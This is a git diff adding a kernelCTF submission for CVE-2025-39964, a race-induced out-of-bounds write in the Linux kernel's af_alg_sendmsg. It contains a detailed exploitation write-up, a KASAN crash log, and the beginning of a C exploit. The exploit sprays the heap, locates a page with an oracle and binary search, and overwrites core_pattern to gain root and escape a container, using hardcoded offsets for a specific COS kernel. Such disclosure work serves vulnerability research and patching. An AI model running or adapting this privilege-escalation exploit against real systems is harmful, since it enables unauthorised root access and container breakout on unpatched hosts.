diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md
new file mode 100644
index 000000000..b55172a50
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md
@@ -0,0 +1,336 @@
+# STAR-2025-0046: Linux Kernel af_alg out-of-bounds access
+
+## Summary
+| **Product** | Linux Kernel |
+| ----------------------- | ------------------------ |
+| **Vendor** | Linux |
+| **Severity** | High - Adversaries may exploit software vulnerabilities to elevate its privileges to root. |
+| **Affected Versions** | [Linux 2.6.38](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2) - upstream |
+| **CVE Identifier** | |
+| **CVE Description** | A out-of-bounds vulnerability in the Linux Kernel af_alg can be exploited to achieve local privilege escalation |
+| **CWE Classification(s)** | CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer |
+
+## CVSS3.1 Scoring System
+**Base Score:** 7.8 (High)
+**Vector String:** `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
+| **Metric** | **Value** |
+| ---------------------------- | --------- |
+| **Attack Vector (AV)** | Local |
+| **Attack Complexity (AC)** | Low |
+| **Privileges Required (PR)** | Low |
+| **User Interaction (UI)** | None |
+| **Scope (S)** | Unchanged |
+| **Confidentiality \(C)** | High |
+| **Integrity (I)** | High |
+| **Availability (A)** | High |
+
+
+## Description of the vulnerability
+
+In `af_alg_sendmsg` function, we can craft context state (`af_alg_ctx`) that have `ctx->merge = 1` and also have last sgl entry that have `sgl->cur = 0`. From that condition we can trigger out-of-bounds in `af_alg_sendmsg` via this code:
+```c
+ /* use the existing memory in an allocated page */
+ if (ctx->merge && !(msg->msg_flags & MSG_SPLICE_PAGES)) {
+ sgl = list_entry(ctx->tsgl_list.prev,
+ struct af_alg_tsgl, list);
+ sg = sgl->sg + sgl->cur - 1; // [1]
+ len = min_t(size_t, len,
+ PAGE_SIZE - sg->offset - sg->length);
+
+ err = memcpy_from_msg(page_address(sg_page(sg)) +
+ sg->offset + sg->length,
+ msg, len);
+```
+
+If sgl->cur = 0 in this state, the calculation at [1] will underflow because `sgl->cur - 1` will be -1 and will point to previous heap chunk, with this codition we can craft such page address at previous chunk and achieve kernel arbitrary write via `memcpy_from_msg`.
+
+This is how we made that such condition happens:
+
+Let say we have situation where:
+1. last sgl->cur = MAX_SGL_ENTS-1
+2. ctx->merge = 0
+
+In this code:
+```C
+
+ if (!af_alg_writable(sk)) {
+ err = af_alg_wait_for_wmem(sk, msg->msg_flags); // [2]
+ if (err)
+ goto unlock;
+ }
+
+ /* allocate a new page */
+ len = min_t(unsigned long, len, af_alg_sndbuf(sk));
+
+ err = af_alg_alloc_tsgl(sk); // [3]
+ if (err)
+ goto unlock;
+
+ sgl = list_entry(ctx->tsgl_list.prev, struct af_alg_tsgl,
+ list);
+ sg = sgl->sg;
+ if (sgl->cur)
+ sg_unmark_end(sg + sgl->cur - 1);
+```
+
+Let say we have two threads do sendmsg, and will stuck at [2] waiting for send buffer available.
+
+We release some buffer and one of the threads will release. This thread, will use the sg available in the last sgl because we have `sgl->cur = MAX_SGL_ENTS-1`. Then this thread will enter this code:
+```c
+ do {
+ struct page *pg;
+ unsigned int i = sgl->cur;
+
+ plen = min_t(size_t, len, PAGE_SIZE);
+
+ pg = alloc_page(GFP_KERNEL);
+ pr_info("[DEBUG] plen %zd, ctx->merge: %d\n", plen, ctx->merge);
+ sg_assign_page(sg + i, pg);
+
+ err = memcpy_from_msg(
+ page_address(sg_page(sg + i)),
+ msg, plen);
+ ...
+ sgl->cur++;
+ } while (len && sgl->cur < MAX_SGL_ENTS);
+
+ ctx->merge = plen & (PAGE_SIZE - 1); //[4]
+```
+Let say we send `len` below the PAGE_SIZE, so `ctx->merge` will set to 1, then this thread will finish.
+
+In this state, we still have one more thread that stuck at `af_alg_wait_for_wmem` [2]. We will release some buffer, and make this thread continue.
+
+Now sgl->cur is MAX_SGL_ENTS, it will alloc another sgl at `af_alg_alloc_tsgl` [3], so we have last sgl that have `sgl->cur = 0`. In this state, we passed invalid user space addr. So code will fail in this line:
+```c
+ err = memcpy_from_msg(
+ page_address(sg_page(sg + i)),
+ msg, plen);
+ if (err) {
+ __free_page(sg_page(sg + i));
+ sg_assign_page(sg + i, NULL);
+ goto unlock; // [5]
+ }
+```
+This thread will finish, and the state of af_alg_ctx is having `ctx->merge = 1` and the last sgl with `sgl->cur = 0`. Next sendmsg will trigger out of bounds like we mention earlier.
+
+## Proof-Of-Concept Crash log
+
+```
+[ 13.816985] ==================================================================
+[ 13.822876] BUG: KASAN: slab-out-of-bounds in af_alg_sendmsg+0x1f38/0x2150
+[ 13.826941] Read of size 8 at addr ffff888012f1fff8 by task exploit/146
+[ 13.828699]
+[ 13.829129] CPU: 1 UID: 1000 PID: 146 Comm: exploit Not tainted 6.12.43 #3
+[ 13.829156] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.4
+[ 13.829184] Call Trace:
+[ 13.829198]
+[ 13.829201] dump_stack_lvl+0x64/0x80
+[ 13.829211] print_report+0xc4/0x640
+[ 13.829218] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
+[ 13.829222] ? af_alg_sendmsg+0x1f38/0x2150
+[ 13.829227] kasan_report+0xc6/0x100
+[ 13.829230] ? af_alg_sendmsg+0x1f38/0x2150
+[ 13.829232] af_alg_sendmsg+0x1f38/0x2150
+[ 13.829236] ? tty_update_time+0x2ea/0x440
+[ 13.829239] ? tty_read+0x340/0x540
+[ 13.829241] ? __pfx_af_alg_sendmsg+0x10/0x10
+[ 13.829243] ? __pfx_aa_sk_perm+0x10/0x10
+[ 13.829247] ? fdget+0x58/0x3e0
+[ 13.829271] __sys_sendto+0x3d8/0x460
+[ 13.829276] ? __pfx___sys_sendto+0x10/0x10
+[ 13.829278] ? vfs_read+0x6c3/0xb70
+[ 13.829282] ? __asan_memset+0x23/0x50
+[ 13.829285] ? ksys_read+0xfe/0x1d0
+[ 13.829287] ? __pfx_ksys_read+0x10/0x10
+[ 13.829290] ? up_read+0x18/0xa0
+[ 13.829293] __x64_sys_sendto+0xe0/0x1c0
+[ 13.829295] ? clear_bhb_loop+0x40/0x90
+[ 13.829299] ? clear_bhb_loop+0x40/0x90
+[ 13.829301] ? clear_bhb_loop+0x40/0x90
+[ 13.829304] do_syscall_64+0x58/0x120
+[ 13.829307] entry_SYSCALL_64_after_hwframe+0x76/0x7e
+[ 13.829310] RIP: 0033:0x423eed
+[ 13.829314] Code: 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 7d 11 09 00 00 419
+[ 13.829317] RSP: 002b:00007ffcc1b6a658 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
+[ 13.829374] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423eed
+[ 13.829376] RDX: 0000000000000800 RSI: 00000000004b5b40 RDI: 0000000000000004
+[ 13.829377] RBP: 00007ffcc1b6a7c0 R08: 0000000000000000 R09: 0000000000000000
+[ 13.829378] R10: 0000000000008000 R11: 0000000000000246 R12: 00007ffcc1b6a8d8
+[ 13.829380] R13: 00007ffcc1b6a8e8 R14: 00000000004af828 R15: 0000000000000001
+[ 13.829382]
+[ 13.829383]
+[ 13.878763] Allocated by task 144:
+[ 13.879617] kasan_save_stack+0x33/0x60
+[ 13.880750] kasan_save_track+0x14/0x30
+[ 13.881689] __kasan_slab_alloc+0x6e/0x70
+[ 13.882691] kmem_cache_alloc_noprof+0x10e/0x2b0
+[ 13.883731] getname_kernel+0x51/0x330
+[ 13.884791] kern_path+0x17/0x50
+[ 13.885467] unix_find_other+0x102/0x6a0
+[ 13.886774] unix_dgram_connect+0x21f/0xc50
+[ 13.887809] __sys_connect+0x103/0x130
+[ 13.888868] __x64_sys_connect+0x72/0xb0
+[ 13.890409] do_syscall_64+0x58/0x120
+[ 13.891238] entry_SYSCALL_64_after_hwframe+0x76/0x7e
+[ 13.892454]
+[ 13.892787] Freed by task 144:
+[ 13.893632] kasan_save_stack+0x33/0x60
+[ 13.894562] kasan_save_track+0x14/0x30
+[ 13.895426] kasan_save_free_info+0x3b/0x60
+[ 13.896244] __kasan_slab_free+0x37/0x50
+[ 13.896964] kmem_cache_free+0x183/0x4b0
+[ 13.897873] kern_path+0x39/0x50
+[ 13.898850] unix_find_other+0x102/0x6a0
+[ 13.899886] unix_dgram_connect+0x21f/0xc50
+[ 13.901424] __sys_connect+0x103/0x130
+[ 13.902278] __x64_sys_connect+0x72/0xb0
+[ 13.903163] do_syscall_64+0x58/0x120
+[ 13.903869] entry_SYSCALL_64_after_hwframe+0x76/0x7e
+[ 13.905231]
+[ 13.905709] The buggy address belongs to the object at ffff888012f1e600
+[ 13.905709] which belongs to the cache names_cache of size 4096
+[ 13.908496] The buggy address is located 2552 bytes to the right of
+[ 13.908496] allocated 4096-byte region [ffff888012f1e600, ffff888012f1f600)
+[ 13.911995]
+[ 13.912381] The buggy address belongs to the physical page:
+[ 13.913783] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12f18
+[ 13.915745] head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0
+[ 13.917829] flags: 0x100000000000040(head|node=0|zone=1)
+[ 13.919473] page_type: f5(slab)
+[ 13.920369] raw: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000
+[ 13.921984] raw: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000
+[ 13.923504] head: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000
+[ 13.925136] head: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000
+[ 13.927011] head: 0100000000000003 ffffea00004bc601 ffffffffffffffff 0000000000000000
+[ 13.928761] head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000
+[ 13.930494] page dumped because: kasan: bad access detected
+[ 13.931957]
+[ 13.932564] Memory state around the buggy address:
+[ 13.934043] ffff888012f1fe80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 13.935662] ffff888012f1ff00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 13.937680] >ffff888012f1ff80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 13.939445] ^
+[ 13.941597] ffff888012f20000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+[ 13.943583] ffff888012f20080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+[ 13.945124] ==================================================================
+[ 13.947164] Disabling lock debugging due to kernel taint
+send4 -1
+```
+
+## Exploit Idea
+
+Since the vulnerability can trigger an integer underflow and cause to reference data from a previous memory chunk, we attempted to spray multiple same-sized chunks using sendmsg().
+This allowed us to control the `page_link` value and achieve arbitrary memory write. By overwriting the `core_pattern`, we successfully escalated privileges and achieved container escape.
+
+```C
+struct scatterlist {
+ long unsigned int page_link; /* 0 8 */
+ unsigned int offset; /* 8 4 */
+ unsigned int length; /* 12 4 */
+ dma_addr_t dma_address; /* 16 8 */
+ unsigned int dma_length; /* 24 4 */
+ unsigned int dma_flags; /* 28 4 */
+
+ /* size: 32, cachelines: 1, members: 6 */
+ /* last cacheline: 32 bytes */
+};
+
+struct af_alg_tsgl {
+ struct list_head list; /* 0 16 */
+ unsigned int cur; /* 16 4 */
+
+ /* XXX 4 bytes hole, try to pack */
+
+ struct scatterlist sg[]; /* 24 0 */
+
+ /* size: 24, cachelines: 1, members: 3 */
+ /* sum members: 20, holes: 1, sum holes: 4 */
+ /* last cacheline: 24 bytes */
+};
+```
+
+### Controlling the write destination via sg[-1].page_link
+
+When `sgl->cur = 0`, `sg = sgl->sg + sgl->cur - 1 = sgl->sg[-1]`.
+`sgl->sg[0]` is at offset 24 from the start of `af_alg_tsgl` (after the 16-byte `list_head` and 4-byte `cur` + 4-byte padding).
+`sg[-1]` is therefore at offset `24 - sizeof(scatterlist) = 24 - 32 = -8` relative to the start of the `af_alg_tsgl` object.
+
+Each `af_alg_tsgl` is `kmalloc`'d into a 4096-byte slab object. So `sg[-1]` falls 8 bytes before the current `af_alg_tsgl`, which is the **last 8 bytes of the previous 4096-byte heap object** at offset `4096 - 8 = 0xff8`.
+
+We use `sendmsg()` spray to fill the previous heap slot with a controlled `msg_control` buffer (`payload[]`).
+`payload[0xff8]` therefore directly aliases `sg[-1].page_link` — the only field we need to control.
+`sg[-1].offset` and `sg[-1].length` come from whatever bytes are at `payload[0xff8+8]` and `payload[0xff8+12]`, but these are fixed (set to `'a'` by our spray) and their values are accounted for in the final offset calculation.
+
+### The write-destination oracle
+
+The vulnerable code is:
+
+```C
+err = memcpy_from_msg(page_address(sg_page(sg)) + sg->offset + sg->length,
+ msg, len);
+```
+
+`sg_page(sg)` interprets `sg->page_link` as a pointer to a `struct page` in the kernel's vmemmap region.
+`page_address(page)` converts that back to a virtual address:
+
+```
+dest = page_offset_base + (page_link - vmemmap_base) / sizeof(struct_page) * PAGE_SIZE
+ + sg->offset + sg->length
+```
+
+With `page_link` near 0, the integer arithmetic wraps around (all 64-bit unsigned):
+
+```
+pfn = (0 - vmemmap_base) / 64 → very large pfn
+dest = page_offset_base + pfn * PAGE_SIZE → wraps back into userspace
+```
+
+This means the computed `dest` lands inside our pre-mapped userspace region `[0x100000000, 0x500000000000)`.
+
+`memcpy_from_msg` internally calls `copy_from_user_iter` with `to = dest`:
+
+```C
+static __always_inline
+size_t copy_from_user_iter(void __user *iter_from, size_t progress,
+ size_t len, void *to, void *priv2)
+```
+
+`__copy_from_user` has two behaviours depending on `to`:
+- If `to` is an **unmapped address**, the copy faults and returns an error — `send()` returns `-1`.
+- If `to` is a **mapped userspace address**, the copy silently succeeds — `send()` returns `1`.
+
+This gives us a clean boolean oracle: **`send()` returns 1 if and only if the current `page_link` maps `dest` to a physically-backed page in our mmap region.**
+
+### Binary search to locate the exact physical page
+
+We pre-map the entire range `[0x100000000, 0x500000000000)` (≈ 80 TB) with anonymous pages in 2 GB chunks. When `page_link = 0` the initial `dest` lands somewhere inside this region — the oracle returns 1.
+
+We then narrow down the exact page with an 8-step binary search:
+
+```
+total range = 0x500000000000 bytes
+half[j] = total >> (1 + j) (halves the address range each step)
+delta[j] = total >> (7 + j) (= half[j] / 64, the page_link adjustment)
+```
+
+At each step `j`, we test `guess_addr(oracle - delta[j])`:
+- Decreasing `page_link` by `delta[j]` shifts `dest` **down** by `delta[j] * 64 = half[j]` bytes.
+- If `send()` returns **1** — the shifted dest is still mapped → `dest` is in the **upper half** of the current range → unmap the lower half, advance `start` to the upper half boundary.
+- If `send()` returns **-1** — the shifted dest fell outside the mapped region → `dest` is in the **lower half** → unmap the upper half, keep `start` unchanged.
+
+After 8 iterations the remaining mapped window is `0x500000000000 >> 9 ≈ 340 MB`.
+A `mincore()` scan over this window finds the exact 4 KB page (identified by the `'a'`-filled content our spray wrote into it).
+
+### Redirecting the write to core_pattern
+
+Once we have the exact userspace virtual address `leak_offset` of the OOB-written page, we know both the physical page and the current within-page byte offset of the write. The steps to redirect to `core_pattern` are:
+
+1. **Align within-page offset**: send `adjust_offset = 0x1000 + (core_pattern & 0xfff) - (leak_offset & 0xfff)` dummy bytes so that the next write starts at the same in-page offset as `core_pattern`.
+
+2. **Adjust page_link to target core_pattern's page**: update `payload[0xff8]` (sg[-1].page_link) by
+ `Δ = ((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6`
+ The `>> 6` (or `/ 64`) is actually a simplification of the formula `(addr / 0x1000) * 64`. We divide the address by `0x1000` to find the page index, and then multiply by `64` because each memory page has a `page_struct` that is exactly 64 bytes long.
+
+3. **Write the payload**: `send(opfd, "|/proc/%P/fd/666 %P", 64, MSG_MORE)` — the kernel copies this string to `core_pattern[]`.
+
+Once `core_pattern` is overwritten, a forked child process (running since exploit start) detects the change via `/proc/sys/kernel/core_pattern`, then deliberately faults (`*(size_t*)0 = 0`) to trigger a coredump. The kernel invokes `core_pattern` as root, re-executing our binary with the parent's PID as `argv[1]`. The re-exec uses `pidfd_getfd()` to steal the parent's stdio file descriptors and reads `/flag`.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md
new file mode 100644
index 000000000..c991c0035
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+ - Capabilities:
+ - Kernel configuration: CONFIG_CRYPTO_USER_API
+ - User namespaces required: No
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285
+- Affected kernel versions: v2.6.36 - v6.16
+- Affected component: crypto/af_alg
+- Cause: Out-of-bound access
+- Syscall to disable:
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-39964
+- Description: A Out-of-bound access in the Linux kernel's crypto/af_alg. In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg Issuing two writes to the same af_alg socket is bogus as the data will be interleaved in an unpredictable fashion. Furthermore, concurrent writes may create inconsistencies in the internal socket state. Disallow this by adding a new ctx->write field that indiciates exclusive ownership for writing.
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile
new file mode 100644
index 000000000..3eabaca61
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile
@@ -0,0 +1,5 @@
+all: exploit
+
+exploit: exploit.c
+ gcc -static-pie -o exploit exploit.c
+
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit
new file mode 100755
index 000000000..ad33ffc71
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c
new file mode 100644
index 000000000..67d4acb78
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c
@@ -0,0 +1,884 @@
+/*
+ * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (COS
+ * 121-18867.199.28)
+ *
+ * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent
+ * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously.
+ * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1],
+ * which is an out-of-bounds read into the previous heap chunk. The
+ * sg[-1].page_link value from the previous chunk controls the destination of
+ * memcpy_from_msg(), giving an arbitrary kernel write primitive.
+ *
+ * Exploit chain (COS 121-18867.199.28):
+ * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr
+ * whose msg_control (payload[]) lands in the heap slot just before an
+ * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write
+ * destination.
+ * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 =
+ * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send.
+ * 3. Fork two children that race: one sets ctx->merge=1
+ * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an
+ * invalid userspace pointer.
+ * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write
+ * to the address derived from payload[PAYLOAD_OFFS_TARGET].
+ * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so
+ * the OOB write destination (which wraps into userspace due to page_link
+ * arithmetic) falls in a mapped region. An 8-step binary search (oracle =
+ * send() return value) narrows the target to a ~340 MB window; mincore then
+ * locates the exact page.
+ * 6. Adjust the write destination via page_link arithmetic to point to the
+ * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P".
+ * 7. A forked child watches for core_pattern to change, then faults (NULL
+ * deref), causing the kernel to execute our binary as root via core_pattern.
+ * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors.
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#ifndef SYS_pidfd_getfd
+#define SYS_pidfd_getfd 438
+#endif
+
+#ifndef SYS_pidfd_open
+#define SYS_pidfd_open 434
+#endif
+
+size_t vmemmap_base = 0xffffea0000000000ULL;
+size_t page_offset_base = 0xffff888000000000ULL;
+size_t core_pattern = 0xffffffff8420d520ULL;
+
+/* Socket options */
+#define ALG_SET_KEY 1
+#define ALG_SET_IV 2
+#define ALG_SET_OP 3
+#define ALG_SET_AEAD_ASSOCLEN 4
+#define ALG_SET_AEAD_AUTHSIZE 5
+#define ALG_SET_DRBG_ENTROPY 6
+#define ALG_SET_KEY_BY_KEY_SERIAL 7
+
+/* Operations */
+#define ALG_OP_DECRYPT 0
+#define ALG_OP_ENCRYPT 1
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+#define __u32 uint32_t
+#define __u16 uint16_t
+#define __u8 uint8_t
+#define PAUSE \
+ { \
+ int x; \
+ printf(":"); \
+ read(0, &x, 1); \
+ }
+
+#define SYSCHK(x) \
+ ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+ })
+
+#ifndef SYS_process_vm_readv
+#define SYS_process_vm_readv 310
+#endif
+
+/* Number of AF_UNIX pairs to spray; one pair per exploit thread */
+#define THREAD_NUM 0x100
+
+/*
+ * Size of each private anonymous mapping used as the OOB write oracle region:
+ * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry.
+ */
+#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000)
+
+/*
+ * Start of the contiguous userspace region we map for the binary-search oracle.
+ * We start just above the 4 GB boundary to avoid the low userspace region.
+ */
+#define SCAN_START_ADDR 0x100000000ULL
+
+/* Maximum number of mincore windows tried during the page-address scan */
+#define MAX_SCAN_ITERATIONS 0x50
+
+/*
+ * Unmapped address passed as invalid user pointer to trigger the race
+ * condition: the first 4 MB of virtual address space (0–0xfff000) is always
+ * unmapped.
+ */
+#define INVALID_USER_ADDR ((void *)0xfff000)
+
+/*
+ * Byte offset of sg[-1].page_link inside the sprayed msg_control payload:
+ * af_alg_tsgl is allocated in a 4096-byte slab object.
+ * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)).
+ * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0],
+ * i.e. at byte 24 - 32 = -8 relative to the tsgl object start.
+ * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8.
+ * scatterlist.page_link is the first field (offset 0), so payload[0xff8]
+ * directly controls the page_link that the OOB write uses as its destination.
+ */
+#define PAYLOAD_OFFS_TARGET 0xff8
+
+/*
+ * Number of send/recv iterations to advance sgl->cur from 1 to 124
+ * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) /
+ * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg
+ * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124;
+ * one more send brings it to 125 = MAX_SGL_ENTS - 1.
+ */
+#define SGL_MERGE_ITERATIONS 0x7b
+
+/* Compile-time unslid base of kernel text (_stext); used when computing symbol
+ * offsets */
+#define KERNEL_TEXT_BASE 0xffffffff81000000UL
+
+/*
+ * KASLR-invariant offset of core_pattern from _stext in COS 121-18867.199.28.
+ * core_pattern is at 0xffffffff83fb48c0; _stext is at KERNEL_TEXT_BASE.
+ */
+#define CORE_PATTERN_COS_OFFSET (0xffffffff83fb48c0UL - KERNEL_TEXT_BASE)
+
+/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR,
+ * SCAN_END_ADDR) */
+#define SCAN_END_ADDR 0x500000000000ULL
+
+/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */
+#define MAP_CHUNK_SIZE 0x80000000ULL
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 0x1000
+#endif
+/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */
+#define PAGE_MASK (PAGE_SIZE - 1)
+
+pthread_t tid[THREAD_NUM];
+
+/* Shared scratch buffer used by spray threads and the main exploit loop */
+char buf[0x10000];
+char vec[0x100000];
+
+int cfd[2];
+int sfd[THREAD_NUM][2];
+char payload[0x1000];
+int opfd;
+
+struct sockaddr_alg {
+ __u16 salg_family;
+ __u8 salg_type[14];
+ __u32 salg_feat;
+ __u32 salg_mask;
+ __u8 salg_name[64];
+};
+
+void set_cpu(int i) {
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(i, &mask);
+ sched_setaffinity(0, sizeof(mask), &mask);
+}
+
+void *spray_send_thread(void *x) {
+ size_t idx = (size_t)x;
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ struct iovec iov = {buf, 0x1000};
+ struct msghdr mhdr = {.msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = payload,
+ .msg_controllen = 0x1000};
+ while (1) {
+ sendmsg(sfd[idx][1], &mhdr, 0);
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ }
+}
+
+/*
+ * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr
+ * whose msg_control buffer (payload[]) will occupy the heap slot immediately
+ * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then
+ * aliases sg[-1].page_link and controls the OOB write destination.
+ */
+void spray_unix_sockets() {
+ memset(payload, 'a', 0x1000);
+ struct cmsghdr *first;
+ first = (struct cmsghdr *)payload;
+ first->cmsg_len = 0x1000;
+ first->cmsg_level =
+ 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */
+ first->cmsg_type = 0x41414141; /* dummy filler value */
+ /* Initially zero; the binary search will update this to guide the OOB write
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+ int n = 0x800;
+ setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+ setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+ write(sfd[i][1], buf, 0x1000);
+ }
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i);
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ read(cfd[1], buf, 1);
+}
+
+/*
+ * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with
+ * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is
+ * crafted with a value near 0, the kernel's page_address() computation wraps
+ * around and the OOB write destination lands somewhere within this region.
+ * Mapping real pages here means the write silently succeeds (our oracle),
+ * letting us binary-search for the exact physical page by progressively
+ * munmap-ing halves of this range.
+ */
+void allocate_map() {
+ char *start = (void *)SCAN_START_ADDR;
+ while (1) {
+ start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0));
+ start += MAP_CHUNK_SIZE;
+ if ((size_t)start >= SCAN_END_ADDR)
+ break;
+ }
+}
+
+/*
+ * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB)
+ * that corresponds to the physical page the OOB write targets. A page marked
+ * resident (mincore bit = 1) that also contains our spray marker ('a') is the
+ * hit: it is the page that the kernel's arbitrary-write wrote into.
+ */
+size_t search_offset(char *start) {
+ char *pvec = NULL;
+ for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) {
+ mincore((void *)start, 0x100000000ULL, vec);
+ pvec = memchr(vec, 1, 0x100000);
+ if (pvec) {
+ char *leak_offset = start + (pvec - vec) * 0x1000;
+ pvec = memchr((void *)leak_offset, 'a', 0x1000);
+ if (pvec)
+ break;
+ }
+ start += 0x100000000ULL;
+ }
+ if (pvec == NULL)
+ exit(0);
+ printf("\npvec %p %x\n", pvec, pvec[0]);
+ return (size_t)pvec;
+}
+
+int check_core() {
+ /* Check if /proc/sys/kernel/core_pattern has been overwritten */
+ char core_pattern_buf[0x100] = {};
+ int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
